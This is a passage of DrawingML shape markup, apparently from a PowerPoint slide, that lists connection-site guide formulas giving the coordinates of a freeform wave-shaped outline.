              <a:gd name="connsiteX15" fmla="*/ 7785900 w 12192000"/>
              <a:gd name="connsiteY15" fmla="*/ 154493 h 4939827"/>
              <a:gd name="connsiteX16" fmla="*/ 7877301 w 12192000"/>
              <a:gd name="connsiteY16" fmla="*/ 186153 h 4939827"/>
              <a:gd name="connsiteX17" fmla="*/ 7952584 w 12192000"/>
              <a:gd name="connsiteY17" fmla="*/ 170181 h 4939827"/>
              <a:gd name="connsiteX18" fmla="*/ 8009534 w 12192000"/>
              <a:gd name="connsiteY18" fmla="*/ 176441 h 4939827"/>
              <a:gd name="connsiteX19" fmla="*/ 8058681 w 12192000"/>
              <a:gd name="connsiteY19" fmla="*/ 219431 h 4939827"/>
              <a:gd name="connsiteX20" fmla="*/ 8126175 w 12192000"/>
              <a:gd name="connsiteY20" fmla="*/ 240005 h 4939827"/>
              <a:gd name="connsiteX21" fmla="*/ 8166439 w 12192000"/>
              <a:gd name="connsiteY21" fmla="*/ 252699 h 4939827"/>
              <a:gd name="connsiteX22" fmla="*/ 8281371 w 12192000"/>
              <a:gd name="connsiteY22" fmla="*/ 256875 h 4939827"/>
              <a:gd name="connsiteX23" fmla="*/ 8381609 w 12192000"/>
              <a:gd name="connsiteY23" fmla="*/ 240618 h 4939827"/>
              <a:gd name="connsiteX24" fmla="*/ 8406759 w 12192000"/>
              <a:gd name="connsiteY24" fmla="*/ 232517 h 4939827"/>
              <a:gd name="connsiteX25" fmla="*/ 8426506 w 12192000"/>
              <a:gd name="connsiteY25" fmla="*/ 241842 h 4939827"/>
              <a:gd name="connsiteX26" fmla="*/ 8427949 w 12192000"/>
              <a:gd name="connsiteY26" fmla="*/ 240981 h 4939827"/>
              <a:gd name="connsiteX27" fmla="*/ 8441468 w 12192000"/>
              <a:gd name="connsiteY27" fmla="*/ 241157 h 4939827"/>
              <a:gd name="connsiteX28" fmla="*/ 8565757 w 12192000"/>
              <a:gd name="connsiteY28" fmla="*/ 255317 h 4939827"/>
              <a:gd name="connsiteX29" fmla="*/ 8573171 w 12192000"/>
              <a:gd name="connsiteY29" fmla="*/ 258426 h 4939827"/>
              <a:gd name="connsiteX30" fmla="*/ 8573548 w 12192000"/>
              <a:gd name="connsiteY30" fmla="*/ 258241 h 4939827"/>
              <a:gd name="connsiteX31" fmla="*/ 8581827 w 12192000"/>
              <a:gd name="connsiteY31" fmla="*/ 261028 h 4939827"/>
              <a:gd name="connsiteX32" fmla="*/ 8586687 w 12192000"/>
              <a:gd name="connsiteY32" fmla="*/ 264089 h 4939827"/>
              <a:gd name="connsiteX33" fmla="*/ 8601067 w 12192000"/>
              <a:gd name="connsiteY33" fmla="*/ 270114 h 4939827"/>
              <a:gd name="connsiteX34" fmla="*/ 8672650 w 12192000"/>
              <a:gd name="connsiteY34" fmla="*/ 254821 h 4939827"/>
              <a:gd name="connsiteX35" fmla="*/ 8785543 w 12192000"/>
              <a:gd name="connsiteY35" fmla="*/ 263406 h 4939827"/>
              <a:gd name="connsiteX36" fmla="*/ 8830588 w 12192000"/>
              <a:gd name="connsiteY36" fmla="*/ 265483 h 4939827"/>
              <a:gd name="connsiteX37" fmla="*/ 8905142 w 12192000"/>
              <a:gd name="connsiteY37" fmla="*/ 264958 h 4939827"/>
              <a:gd name="connsiteX38" fmla="*/ 8968582 w 12192000"/>
              <a:gd name="connsiteY38" fmla="*/ 262728 h 4939827"/>
              <a:gd name="connsiteX39" fmla="*/ 8972994 w 12192000"/>
              <a:gd name="connsiteY39" fmla="*/ 263284 h 4939827"/>
              <a:gd name="connsiteX40" fmla="*/ 9004605 w 12192000"/>
              <a:gd name="connsiteY40" fmla="*/ 258041 h 4939827"/>
              <a:gd name="connsiteX41" fmla="*/ 9016165 w 12192000"/>
              <a:gd name="connsiteY41" fmla="*/ 261258 h 4939827"/>
              <a:gd name="connsiteX42" fmla="*/ 9043297 w 12192000"/>
              <a:gd name="connsiteY42" fmla="*/ 281547 h 4939827"/>
              <a:gd name="connsiteX43" fmla="*/ 9048315 w 12192000"/>
              <a:gd name="connsiteY43" fmla="*/ 279264 h 4939827"/>
              <a:gd name="connsiteX44" fmla="*/ 9054706 w 12192000"/>
              <a:gd name="connsiteY44" fmla="*/ 278538 h 4939827"/>
              <a:gd name="connsiteX45" fmla="*/ 9070919 w 12192000"/>
              <a:gd name="connsiteY45" fmla="*/ 281810 h 4939827"/>
              <a:gd name="connsiteX46" fmla="*/ 9076813 w 12192000"/>
              <a:gd name="connsiteY46" fmla="*/ 283909 h 4939827"/>
              <a:gd name="connsiteX47" fmla="*/ 9085871 w 12192000"/>
              <a:gd name="connsiteY47" fmla="*/ 285133 h 4939827"/>
              <a:gd name="connsiteX48" fmla="*/ 9086159 w 12192000"/>
              <a:gd name="connsiteY48" fmla="*/ 284887 h 4939827"/>
              <a:gd name="connsiteX49" fmla="*/ 9134606 w 12192000"/>
              <a:gd name="connsiteY49" fmla="*/ 288168 h 4939827"/>
              <a:gd name="connsiteX50" fmla="*/ 9195590 w 12192000"/>
              <a:gd name="connsiteY50" fmla="*/ 279568 h 4939827"/>
              <a:gd name="connsiteX51" fmla="*/ 9219336 w 12192000"/>
              <a:gd name="connsiteY51" fmla="*/ 278133 h 4939827"/>
              <a:gd name="connsiteX52" fmla="*/ 9232362 w 12192000"/>
              <a:gd name="connsiteY52" fmla="*/ 275894 h 4939827"/>
              <a:gd name="connsiteX53" fmla="*/ 9233396 w 12192000"/>
              <a:gd name="connsiteY53" fmla="*/ 274803 h 4939827"/>
              <a:gd name="connsiteX54" fmla="*/ 9256213 w 12192000"/>
              <a:gd name="connsiteY54" fmla="*/ 281576 h 4939827"/>
              <a:gd name="connsiteX55" fmla="*/ 9371484 w 12192000"/>
              <a:gd name="connsiteY55" fmla="*/ 329634 h 4939827"/>
              <a:gd name="connsiteX56" fmla="*/ 9404829 w 12192000"/>
              <a:gd name="connsiteY56" fmla="*/ 339038 h 4939827"/>
              <a:gd name="connsiteX57" fmla="*/ 9427021 w 12192000"/>
              <a:gd name="connsiteY57" fmla="*/ 358784 h 4939827"/>
              <a:gd name="connsiteX58" fmla="*/ 9670844 w 12192000"/>
              <a:gd name="connsiteY58" fmla="*/ 405128 h 4939827"/>
              <a:gd name="connsiteX59" fmla="*/ 9816083 w 12192000"/>
              <a:gd name="connsiteY59" fmla="*/ 416573 h 4939827"/>
              <a:gd name="connsiteX60" fmla="*/ 9936741 w 12192000"/>
              <a:gd name="connsiteY60" fmla="*/ 437044 h 4939827"/>
              <a:gd name="connsiteX61" fmla="*/ 10050093 w 12192000"/>
              <a:gd name="connsiteY61" fmla="*/ 443783 h 4939827"/>
              <a:gd name="connsiteX62" fmla="*/ 10130090 w 12192000"/>
              <a:gd name="connsiteY62" fmla="*/ 459520 h 4939827"/>
              <a:gd name="connsiteX63" fmla="*/ 10173456 w 12192000"/>
              <a:gd name="connsiteY63" fmla="*/ 457749 h 4939827"/>
              <a:gd name="connsiteX64" fmla="*/ 10218232 w 12192000"/>
              <a:gd name="connsiteY64" fmla="*/ 459820 h 4939827"/>
              <a:gd name="connsiteX65" fmla="*/ 10354176 w 12192000"/>
              <a:gd name="connsiteY65" fmla="*/ 471377 h 4939827"/>
              <a:gd name="connsiteX66" fmla="*/ 10430681 w 12192000"/>
              <a:gd name="connsiteY66" fmla="*/ 481226 h 4939827"/>
              <a:gd name="connsiteX67" fmla="*/ 10478169 w 12192000"/>
              <a:gd name="connsiteY67" fmla="*/ 481774 h 4939827"/>
              <a:gd name="connsiteX68" fmla="*/ 10540907 w 12192000"/>
              <a:gd name="connsiteY68" fmla="*/ 485607 h 4939827"/>
              <a:gd name="connsiteX69" fmla="*/ 10614941 w 12192000"/>
              <a:gd name="connsiteY69" fmla="*/ 487592 h 4939827"/>
              <a:gd name="connsiteX70" fmla="*/ 10674098 w 12192000"/>
              <a:gd name="connsiteY70" fmla="*/ 521656 h 4939827"/>
              <a:gd name="connsiteX71" fmla="*/ 10874834 w 12192000"/>
              <a:gd name="connsiteY71" fmla="*/ 574867 h 4939827"/>
              <a:gd name="connsiteX72" fmla="*/ 10944981 w 12192000"/>
              <a:gd name="connsiteY72" fmla="*/ 615042 h 4939827"/>
              <a:gd name="connsiteX73" fmla="*/ 11006376 w 12192000"/>
              <a:gd name="connsiteY73" fmla="*/ 645957 h 4939827"/>
              <a:gd name="connsiteX74" fmla="*/ 11076308 w 12192000"/>
              <a:gd name="connsiteY74" fmla="*/ 675698 h 4939827"/>
              <a:gd name="connsiteX75" fmla="*/ 11148789 w 12192000"/>
              <a:gd name="connsiteY75" fmla="*/ 685041 h 4939827"/>
              <a:gd name="connsiteX76" fmla="*/ 11249129 w 12192000"/>
              <a:gd name="connsiteY76" fmla="*/ 684218 h 4939827"/>
              <a:gd name="connsiteX77" fmla="*/ 11299915 w 12192000"/>
              <a:gd name="connsiteY77" fmla="*/ 692177 h 4939827"/>
              <a:gd name="connsiteX78" fmla="*/ 11386973 w 12192000"/>
              <a:gd name="connsiteY78" fmla="*/ 708209 h 4939827"/>
              <a:gd name="connsiteX79" fmla="*/ 11500105 w 12192000"/>
              <a:gd name="connsiteY79" fmla="*/ 735014 h 4939827"/>
              <a:gd name="connsiteX80" fmla="*/ 11621735 w 12192000"/>
              <a:gd name="connsiteY80" fmla="*/ 789584 h 4939827"/>
              <a:gd name="connsiteX81" fmla="*/ 11691200 w 12192000"/>
              <a:gd name="connsiteY81" fmla="*/ 867902 h 4939827"/>
              <a:gd name="connsiteX82" fmla="*/ 11819427 w 12192000"/>
              <a:gd name="connsiteY82" fmla="*/ 911634 h 4939827"/>
              <a:gd name="connsiteX83" fmla="*/ 11969720 w 12192000"/>
              <a:gd name="connsiteY83" fmla="*/ 964737 h 4939827"/>
              <a:gd name="connsiteX84" fmla="*/ 12055766 w 12192000"/>
              <a:gd name="connsiteY84" fmla="*/ 991268 h 4939827"/>
              <a:gd name="connsiteX85" fmla="*/ 12171539 w 12192000"/>
              <a:gd name="connsiteY85" fmla="*/ 995427 h 4939827"/>
              <a:gd name="connsiteX86" fmla="*/ 12187831 w 12192000"/>
              <a:gd name="connsiteY86" fmla="*/ 996580 h 4939827"/>
              <a:gd name="connsiteX87" fmla="*/ 12192000 w 12192000"/>
              <a:gd name="connsiteY87" fmla="*/ 996726 h 4939827"/>
              <a:gd name="connsiteX88" fmla="*/ 12192000 w 12192000"/>
              <a:gd name="connsiteY88" fmla="*/ 4939827 h 4939827"/>
              <a:gd name="connsiteX89" fmla="*/ 0 w 12192000"/>
              <a:gd name="connsiteY89" fmla="*/ 4939827 h 4939827"/>
              <a:gd name="connsiteX90" fmla="*/ 0 w 12192000"/>
              <a:gd name="connsiteY90" fmla="*/ 512043 h 4939827"/>
              <a:gd name="connsiteX91" fmla="*/ 7381 w 12192000"/>
              <a:gd name="connsiteY91" fmla="*/ 512580 h 4939827"/>
              <a:gd name="connsiteX92" fmla="*/ 100029 w 12192000"/>
              <a:gd name="connsiteY92" fmla="*/ 504758 h 4939827"/>
              <a:gd name="connsiteX93" fmla="*/ 155244 w 12192000"/>
              <a:gd name="connsiteY93" fmla="*/ 525130 h 4939827"/>
              <a:gd name="connsiteX94" fmla="*/ 254366 w 12192000"/>
              <a:gd name="connsiteY94" fmla="*/ 534449 h 4939827"/>
              <a:gd name="connsiteX95" fmla="*/ 447292 w 12192000"/>
              <a:gd name="connsiteY95" fmla="*/ 542725 h 4939827"/>
              <a:gd name="connsiteX96" fmla="*/ 628105 w 12192000"/>
              <a:gd name="connsiteY96" fmla="*/ 547853 h 4939827"/>
              <a:gd name="connsiteX97" fmla="*/ 783146 w 12192000"/>
              <a:gd name="connsiteY97" fmla="*/ 591799 h 4939827"/>
              <a:gd name="connsiteX98" fmla="*/ 1043676 w 12192000"/>
              <a:gd name="connsiteY98" fmla="*/ 591887 h 4939827"/>
              <a:gd name="connsiteX99" fmla="*/ 1281816 w 12192000"/>
              <a:gd name="connsiteY99" fmla="*/ 520946 h 4939827"/>
              <a:gd name="connsiteX100" fmla="*/ 1486347 w 12192000"/>
              <a:gd name="connsiteY100" fmla="*/ 487310 h 4939827"/>
              <a:gd name="connsiteX101" fmla="*/ 1568079 w 12192000"/>
              <a:gd name="connsiteY101" fmla="*/ 462531 h 4939827"/>
              <a:gd name="connsiteX102" fmla="*/ 1622516 w 12192000"/>
              <a:gd name="connsiteY102" fmla="*/ 466058 h 4939827"/>
              <a:gd name="connsiteX103" fmla="*/ 1655457 w 12192000"/>
              <a:gd name="connsiteY103" fmla="*/ 465359 h 4939827"/>
              <a:gd name="connsiteX104" fmla="*/ 1717454 w 12192000"/>
              <a:gd name="connsiteY104" fmla="*/ 417203 h 4939827"/>
              <a:gd name="connsiteX105" fmla="*/ 1913794 w 12192000"/>
              <a:gd name="connsiteY105" fmla="*/ 365255 h 4939827"/>
              <a:gd name="connsiteX106" fmla="*/ 2129762 w 12192000"/>
              <a:gd name="connsiteY106" fmla="*/ 367832 h 4939827"/>
              <a:gd name="connsiteX107" fmla="*/ 2376970 w 12192000"/>
              <a:gd name="connsiteY107" fmla="*/ 350129 h 4939827"/>
              <a:gd name="connsiteX108" fmla="*/ 2480155 w 12192000"/>
              <a:gd name="connsiteY108" fmla="*/ 359227 h 4939827"/>
              <a:gd name="connsiteX109" fmla="*/ 2586782 w 12192000"/>
              <a:gd name="connsiteY109" fmla="*/ 339352 h 4939827"/>
              <a:gd name="connsiteX110" fmla="*/ 2679617 w 12192000"/>
              <a:gd name="connsiteY110" fmla="*/ 305383 h 4939827"/>
              <a:gd name="connsiteX111" fmla="*/ 2788947 w 12192000"/>
              <a:gd name="connsiteY111" fmla="*/ 250375 h 4939827"/>
              <a:gd name="connsiteX112" fmla="*/ 2965530 w 12192000"/>
              <a:gd name="connsiteY112" fmla="*/ 245958 h 4939827"/>
              <a:gd name="connsiteX113" fmla="*/ 3103677 w 12192000"/>
              <a:gd name="connsiteY113" fmla="*/ 209527 h 4939827"/>
              <a:gd name="connsiteX114" fmla="*/ 3126759 w 12192000"/>
              <a:gd name="connsiteY114" fmla="*/ 211226 h 4939827"/>
              <a:gd name="connsiteX115" fmla="*/ 3164020 w 12192000"/>
              <a:gd name="connsiteY115" fmla="*/ 212779 h 4939827"/>
              <a:gd name="connsiteX116" fmla="*/ 3285019 w 12192000"/>
              <a:gd name="connsiteY116" fmla="*/ 220535 h 4939827"/>
              <a:gd name="connsiteX117" fmla="*/ 3365154 w 12192000"/>
              <a:gd name="connsiteY117" fmla="*/ 226416 h 4939827"/>
              <a:gd name="connsiteX118" fmla="*/ 3367507 w 12192000"/>
              <a:gd name="connsiteY118" fmla="*/ 225416 h 4939827"/>
              <a:gd name="connsiteX119" fmla="*/ 3387567 w 12192000"/>
              <a:gd name="connsiteY119" fmla="*/ 227103 h 4939827"/>
              <a:gd name="connsiteX120" fmla="*/ 3498001 w 12192000"/>
              <a:gd name="connsiteY120" fmla="*/ 231941 h 4939827"/>
              <a:gd name="connsiteX121" fmla="*/ 3561557 w 12192000"/>
              <a:gd name="connsiteY121" fmla="*/ 228095 h 4939827"/>
              <a:gd name="connsiteX122" fmla="*/ 3611920 w 12192000"/>
              <a:gd name="connsiteY122" fmla="*/ 218094 h 4939827"/>
              <a:gd name="connsiteX123" fmla="*/ 3620528 w 12192000"/>
              <a:gd name="connsiteY123" fmla="*/ 218788 h 4939827"/>
              <a:gd name="connsiteX124" fmla="*/ 3620766 w 12192000"/>
              <a:gd name="connsiteY124" fmla="*/ 218511 h 4939827"/>
              <a:gd name="connsiteX125" fmla="*/ 3629977 w 12192000"/>
              <a:gd name="connsiteY125" fmla="*/ 218664 h 4939827"/>
              <a:gd name="connsiteX126" fmla="*/ 3636217 w 12192000"/>
              <a:gd name="connsiteY126" fmla="*/ 220048 h 4939827"/>
              <a:gd name="connsiteX127" fmla="*/ 3709484 w 12192000"/>
              <a:gd name="connsiteY127" fmla="*/ 186927 h 4939827"/>
              <a:gd name="connsiteX128" fmla="*/ 3761342 w 12192000"/>
              <a:gd name="connsiteY128" fmla="*/ 177474 h 4939827"/>
              <a:gd name="connsiteX129" fmla="*/ 3799748 w 12192000"/>
              <a:gd name="connsiteY129" fmla="*/ 167154 h 4939827"/>
              <a:gd name="connsiteX130" fmla="*/ 3922756 w 12192000"/>
              <a:gd name="connsiteY130" fmla="*/ 194044 h 4939827"/>
              <a:gd name="connsiteX131" fmla="*/ 4028476 w 12192000"/>
              <a:gd name="connsiteY131" fmla="*/ 223679 h 4939827"/>
              <a:gd name="connsiteX132" fmla="*/ 4191582 w 12192000"/>
              <a:gd name="connsiteY132" fmla="*/ 238952 h 4939827"/>
              <a:gd name="connsiteX133" fmla="*/ 4251024 w 12192000"/>
              <a:gd name="connsiteY133" fmla="*/ 240874 h 4939827"/>
              <a:gd name="connsiteX134" fmla="*/ 4355275 w 12192000"/>
              <a:gd name="connsiteY134" fmla="*/ 260205 h 4939827"/>
              <a:gd name="connsiteX135" fmla="*/ 4423807 w 12192000"/>
              <a:gd name="connsiteY135" fmla="*/ 270366 h 4939827"/>
              <a:gd name="connsiteX136" fmla="*/ 4558432 w 12192000"/>
              <a:gd name="connsiteY136" fmla="*/ 269194 h 4939827"/>
              <a:gd name="connsiteX137" fmla="*/ 4635061 w 12192000"/>
              <a:gd name="connsiteY137" fmla="*/ 280682 h 4939827"/>
              <a:gd name="connsiteX138" fmla="*/ 4807427 w 12192000"/>
              <a:gd name="connsiteY138" fmla="*/ 276835 h 4939827"/>
              <a:gd name="connsiteX139" fmla="*/ 5028933 w 12192000"/>
              <a:gd name="connsiteY139" fmla="*/ 183887 h 4939827"/>
              <a:gd name="connsiteX140" fmla="*/ 5093642 w 12192000"/>
              <a:gd name="connsiteY140" fmla="*/ 177214 h 4939827"/>
              <a:gd name="connsiteX141" fmla="*/ 5102642 w 12192000"/>
              <a:gd name="connsiteY141" fmla="*/ 186816 h 4939827"/>
              <a:gd name="connsiteX142" fmla="*/ 5193590 w 12192000"/>
              <a:gd name="connsiteY142" fmla="*/ 156458 h 4939827"/>
              <a:gd name="connsiteX143" fmla="*/ 5323922 w 12192000"/>
              <a:gd name="connsiteY143" fmla="*/ 146332 h 4939827"/>
              <a:gd name="connsiteX144" fmla="*/ 5421860 w 12192000"/>
              <a:gd name="connsiteY144" fmla="*/ 167298 h 4939827"/>
              <a:gd name="connsiteX145" fmla="*/ 5476948 w 12192000"/>
              <a:gd name="connsiteY145" fmla="*/ 173249 h 4939827"/>
              <a:gd name="connsiteX146" fmla="*/ 5516842 w 12192000"/>
              <a:gd name="connsiteY146" fmla="*/ 184018 h 4939827"/>
              <a:gd name="connsiteX147" fmla="*/ 5619415 w 12192000"/>
              <a:gd name="connsiteY147" fmla="*/ 176781 h 4939827"/>
              <a:gd name="connsiteX148" fmla="*/ 5789867 w 12192000"/>
              <a:gd name="connsiteY148" fmla="*/ 150304 h 4939827"/>
              <a:gd name="connsiteX149" fmla="*/ 5825953 w 12192000"/>
              <a:gd name="connsiteY149" fmla="*/ 147907 h 4939827"/>
              <a:gd name="connsiteX150" fmla="*/ 5856168 w 12192000"/>
              <a:gd name="connsiteY150" fmla="*/ 158719 h 4939827"/>
              <a:gd name="connsiteX151" fmla="*/ 5862476 w 12192000"/>
              <a:gd name="connsiteY151" fmla="*/ 172447 h 4939827"/>
              <a:gd name="connsiteX152" fmla="*/ 5882195 w 12192000"/>
              <a:gd name="connsiteY152" fmla="*/ 173195 h 4939827"/>
              <a:gd name="connsiteX153" fmla="*/ 5887271 w 12192000"/>
              <a:gd name="connsiteY153" fmla="*/ 176084 h 4939827"/>
              <a:gd name="connsiteX154" fmla="*/ 5921577 w 12192000"/>
              <a:gd name="connsiteY154" fmla="*/ 169858 h 4939827"/>
              <a:gd name="connsiteX155" fmla="*/ 5983240 w 12192000"/>
              <a:gd name="connsiteY155" fmla="*/ 152755 h 4939827"/>
              <a:gd name="connsiteX156" fmla="*/ 6152287 w 12192000"/>
              <a:gd name="connsiteY156" fmla="*/ 116736 h 4939827"/>
              <a:gd name="connsiteX157" fmla="*/ 6415830 w 12192000"/>
              <a:gd name="connsiteY157" fmla="*/ 136006 h 4939827"/>
              <a:gd name="connsiteX158" fmla="*/ 6756965 w 12192000"/>
              <a:gd name="connsiteY158" fmla="*/ 57636 h 4939827"/>
              <a:gd name="connsiteX159" fmla="*/ 6819400 w 12192000"/>
              <a:gd name="connsiteY159" fmla="*/ 30742 h 4939827"/>
              <a:gd name="connsiteX160" fmla="*/ 6986370 w 12192000"/>
              <a:gd name="connsiteY160" fmla="*/ 12659 h 4939827"/>
              <a:gd name="connsiteX161" fmla="*/ 6989536 w 12192000"/>
              <a:gd name="connsiteY161" fmla="*/ 14528 h 4939827"/>
              <a:gd name="connsiteX162" fmla="*/ 7015933 w 12192000"/>
              <a:gd name="connsiteY162" fmla="*/ 9653 h 4939827"/>
              <a:gd name="connsiteX163" fmla="*/ 7020592 w 12192000"/>
              <a:gd name="connsiteY163" fmla="*/ 1651 h 4939827"/>
              <a:gd name="connsiteX164" fmla="*/ 7025905 w 12192000"/>
              <a:gd name="connsiteY164"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877301 w 12192000"/>
              <a:gd name="connsiteY15" fmla="*/ 186153 h 4939827"/>
              <a:gd name="connsiteX16" fmla="*/ 7952584 w 12192000"/>
              <a:gd name="connsiteY16" fmla="*/ 170181 h 4939827"/>
              <a:gd name="connsiteX17" fmla="*/ 8009534 w 12192000"/>
              <a:gd name="connsiteY17" fmla="*/ 176441 h 4939827"/>
              <a:gd name="connsiteX18" fmla="*/ 8058681 w 12192000"/>
              <a:gd name="connsiteY18" fmla="*/ 219431 h 4939827"/>
              <a:gd name="connsiteX19" fmla="*/ 8126175 w 12192000"/>
              <a:gd name="connsiteY19" fmla="*/ 240005 h 4939827"/>
              <a:gd name="connsiteX20" fmla="*/ 8166439 w 12192000"/>
              <a:gd name="connsiteY20" fmla="*/ 252699 h 4939827"/>
              <a:gd name="connsiteX21" fmla="*/ 8281371 w 12192000"/>
              <a:gd name="connsiteY21" fmla="*/ 256875 h 4939827"/>
              <a:gd name="connsiteX22" fmla="*/ 8381609 w 12192000"/>
              <a:gd name="connsiteY22" fmla="*/ 240618 h 4939827"/>
              <a:gd name="connsiteX23" fmla="*/ 8406759 w 12192000"/>
              <a:gd name="connsiteY23" fmla="*/ 232517 h 4939827"/>
              <a:gd name="connsiteX24" fmla="*/ 8426506 w 12192000"/>
              <a:gd name="connsiteY24" fmla="*/ 241842 h 4939827"/>
              <a:gd name="connsiteX25" fmla="*/ 8427949 w 12192000"/>
              <a:gd name="connsiteY25" fmla="*/ 240981 h 4939827"/>
              <a:gd name="connsiteX26" fmla="*/ 8441468 w 12192000"/>
              <a:gd name="connsiteY26" fmla="*/ 241157 h 4939827"/>
              <a:gd name="connsiteX27" fmla="*/ 8565757 w 12192000"/>
              <a:gd name="connsiteY27" fmla="*/ 255317 h 4939827"/>
              <a:gd name="connsiteX28" fmla="*/ 8573171 w 12192000"/>
              <a:gd name="connsiteY28" fmla="*/ 258426 h 4939827"/>
              <a:gd name="connsiteX29" fmla="*/ 8573548 w 12192000"/>
              <a:gd name="connsiteY29" fmla="*/ 258241 h 4939827"/>
              <a:gd name="connsiteX30" fmla="*/ 8581827 w 12192000"/>
              <a:gd name="connsiteY30" fmla="*/ 261028 h 4939827"/>
              <a:gd name="connsiteX31" fmla="*/ 8586687 w 12192000"/>
              <a:gd name="connsiteY31" fmla="*/ 264089 h 4939827"/>
              <a:gd name="connsiteX32" fmla="*/ 8601067 w 12192000"/>
              <a:gd name="connsiteY32" fmla="*/ 270114 h 4939827"/>
              <a:gd name="connsiteX33" fmla="*/ 8672650 w 12192000"/>
              <a:gd name="connsiteY33" fmla="*/ 254821 h 4939827"/>
              <a:gd name="connsiteX34" fmla="*/ 8785543 w 12192000"/>
              <a:gd name="connsiteY34" fmla="*/ 263406 h 4939827"/>
              <a:gd name="connsiteX35" fmla="*/ 8830588 w 12192000"/>
              <a:gd name="connsiteY35" fmla="*/ 265483 h 4939827"/>
              <a:gd name="connsiteX36" fmla="*/ 8905142 w 12192000"/>
              <a:gd name="connsiteY36" fmla="*/ 264958 h 4939827"/>
              <a:gd name="connsiteX37" fmla="*/ 8968582 w 12192000"/>
              <a:gd name="connsiteY37" fmla="*/ 262728 h 4939827"/>
              <a:gd name="connsiteX38" fmla="*/ 8972994 w 12192000"/>
              <a:gd name="connsiteY38" fmla="*/ 263284 h 4939827"/>
              <a:gd name="connsiteX39" fmla="*/ 9004605 w 12192000"/>
              <a:gd name="connsiteY39" fmla="*/ 258041 h 4939827"/>
              <a:gd name="connsiteX40" fmla="*/ 9016165 w 12192000"/>
              <a:gd name="connsiteY40" fmla="*/ 261258 h 4939827"/>
              <a:gd name="connsiteX41" fmla="*/ 9043297 w 12192000"/>
              <a:gd name="connsiteY41" fmla="*/ 281547 h 4939827"/>
              <a:gd name="connsiteX42" fmla="*/ 9048315 w 12192000"/>
              <a:gd name="connsiteY42" fmla="*/ 279264 h 4939827"/>
              <a:gd name="connsiteX43" fmla="*/ 9054706 w 12192000"/>
              <a:gd name="connsiteY43" fmla="*/ 278538 h 4939827"/>
              <a:gd name="connsiteX44" fmla="*/ 9070919 w 12192000"/>
              <a:gd name="connsiteY44" fmla="*/ 281810 h 4939827"/>
              <a:gd name="connsiteX45" fmla="*/ 9076813 w 12192000"/>
              <a:gd name="connsiteY45" fmla="*/ 283909 h 4939827"/>
              <a:gd name="connsiteX46" fmla="*/ 9085871 w 12192000"/>
              <a:gd name="connsiteY46" fmla="*/ 285133 h 4939827"/>
              <a:gd name="connsiteX47" fmla="*/ 9086159 w 12192000"/>
              <a:gd name="connsiteY47" fmla="*/ 284887 h 4939827"/>
              <a:gd name="connsiteX48" fmla="*/ 9134606 w 12192000"/>
              <a:gd name="connsiteY48" fmla="*/ 288168 h 4939827"/>
              <a:gd name="connsiteX49" fmla="*/ 9195590 w 12192000"/>
              <a:gd name="connsiteY49" fmla="*/ 279568 h 4939827"/>
              <a:gd name="connsiteX50" fmla="*/ 9219336 w 12192000"/>
              <a:gd name="connsiteY50" fmla="*/ 278133 h 4939827"/>
              <a:gd name="connsiteX51" fmla="*/ 9232362 w 12192000"/>
              <a:gd name="connsiteY51" fmla="*/ 275894 h 4939827"/>
              <a:gd name="connsiteX52" fmla="*/ 9233396 w 12192000"/>
              <a:gd name="connsiteY52" fmla="*/ 274803 h 4939827"/>
              <a:gd name="connsiteX53" fmla="*/ 9256213 w 12192000"/>
              <a:gd name="connsiteY53" fmla="*/ 281576 h 4939827"/>
              <a:gd name="connsiteX54" fmla="*/ 9371484 w 12192000"/>
              <a:gd name="connsiteY54" fmla="*/ 329634 h 4939827"/>
              <a:gd name="connsiteX55" fmla="*/ 9404829 w 12192000"/>
              <a:gd name="connsiteY55" fmla="*/ 339038 h 4939827"/>
              <a:gd name="connsiteX56" fmla="*/ 9427021 w 12192000"/>
              <a:gd name="connsiteY56" fmla="*/ 358784 h 4939827"/>
              <a:gd name="connsiteX57" fmla="*/ 9670844 w 12192000"/>
              <a:gd name="connsiteY57" fmla="*/ 405128 h 4939827"/>
              <a:gd name="connsiteX58" fmla="*/ 9816083 w 12192000"/>
              <a:gd name="connsiteY58" fmla="*/ 416573 h 4939827"/>
              <a:gd name="connsiteX59" fmla="*/ 9936741 w 12192000"/>
              <a:gd name="connsiteY59" fmla="*/ 437044 h 4939827"/>
              <a:gd name="connsiteX60" fmla="*/ 10050093 w 12192000"/>
              <a:gd name="connsiteY60" fmla="*/ 443783 h 4939827"/>
              <a:gd name="connsiteX61" fmla="*/ 10130090 w 12192000"/>
              <a:gd name="connsiteY61" fmla="*/ 459520 h 4939827"/>
              <a:gd name="connsiteX62" fmla="*/ 10173456 w 12192000"/>
              <a:gd name="connsiteY62" fmla="*/ 457749 h 4939827"/>
              <a:gd name="connsiteX63" fmla="*/ 10218232 w 12192000"/>
              <a:gd name="connsiteY63" fmla="*/ 459820 h 4939827"/>
              <a:gd name="connsiteX64" fmla="*/ 10354176 w 12192000"/>
              <a:gd name="connsiteY64" fmla="*/ 471377 h 4939827"/>
              <a:gd name="connsiteX65" fmla="*/ 10430681 w 12192000"/>
              <a:gd name="connsiteY65" fmla="*/ 481226 h 4939827"/>
              <a:gd name="connsiteX66" fmla="*/ 10478169 w 12192000"/>
              <a:gd name="connsiteY66" fmla="*/ 481774 h 4939827"/>
              <a:gd name="connsiteX67" fmla="*/ 10540907 w 12192000"/>
              <a:gd name="connsiteY67" fmla="*/ 485607 h 4939827"/>
              <a:gd name="connsiteX68" fmla="*/ 10614941 w 12192000"/>
              <a:gd name="connsiteY68" fmla="*/ 487592 h 4939827"/>
              <a:gd name="connsiteX69" fmla="*/ 10674098 w 12192000"/>
              <a:gd name="connsiteY69" fmla="*/ 521656 h 4939827"/>
              <a:gd name="connsiteX70" fmla="*/ 10874834 w 12192000"/>
              <a:gd name="connsiteY70" fmla="*/ 574867 h 4939827"/>
              <a:gd name="connsiteX71" fmla="*/ 10944981 w 12192000"/>
              <a:gd name="connsiteY71" fmla="*/ 615042 h 4939827"/>
              <a:gd name="connsiteX72" fmla="*/ 11006376 w 12192000"/>
              <a:gd name="connsiteY72" fmla="*/ 645957 h 4939827"/>
              <a:gd name="connsiteX73" fmla="*/ 11076308 w 12192000"/>
              <a:gd name="connsiteY73" fmla="*/ 675698 h 4939827"/>
              <a:gd name="connsiteX74" fmla="*/ 11148789 w 12192000"/>
              <a:gd name="connsiteY74" fmla="*/ 685041 h 4939827"/>
              <a:gd name="connsiteX75" fmla="*/ 11249129 w 12192000"/>
              <a:gd name="connsiteY75" fmla="*/ 684218 h 4939827"/>
              <a:gd name="connsiteX76" fmla="*/ 11299915 w 12192000"/>
              <a:gd name="connsiteY76" fmla="*/ 692177 h 4939827"/>
